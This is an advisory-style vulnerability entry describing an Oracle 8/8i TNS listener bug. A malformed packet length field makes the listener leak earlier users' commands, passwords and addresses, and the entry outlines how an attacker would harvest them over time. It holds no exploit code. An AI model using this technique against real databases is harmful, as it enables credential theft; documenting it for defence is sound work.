Threat Finder

Threat ID
3
Threat Date
08/06/2007
Threat Name
TNS packet leaking
CVE Reference
CVE-NO-MATCH
CCE Reference
CCE-NO-MATCH
Risk
Medium
Database Type
No Application Type
Category
Unsupported
Versions
Oracle8 and Oracle 8i
Summary
A bug in the listener service allows malformed listener commands to return commands submitted previously by other users. By viewing other users' commands, an attacker can gain information such as usernames or even the listener password.
Overview
Commands run on the listener service can be leaked to other users. This allows an anonymous user to query a listener for previous statements which may contain sensitive info such as:
- the listener password
- usernames
- client addresses

This attack works by sending a malformed command to the listener. Within the header of a listener packet, a field is used to indicate the length of the command being sent. If the message length in the header is greater than the actual message length sent, the listener will copy extraneous data into the buffer it returns, including:
- previous commands
- the results of previous commands

This attack can be mounted by any remote users that can send packets to the IP address and port of the listener. It can not be mounted by an attacker outside your organization if a firewall is properly protecting the database.

An attacker would use this vulnerability to collect information about the database. No authentication credentials are required to run this attack. An attacker would repeatedly run this attack over a series of days, collecting a list of users and client address, and hoping to catch the database administrator connecting to the listener using the password.
References
http://www.jammed.com/~jwa/hacks/security/tnscmd/
http://www.jammed.com/~jwa/hacks/security/tnscmd/tns-advisory.txt
http://www.securiteam.com/tools/5TP0Q2K40Y.html
VMSKey
STIGID

Additional information including fix script information is available in the licensed versions of Application Security's DbProtect and AppDetectivePro solutions.

Powered by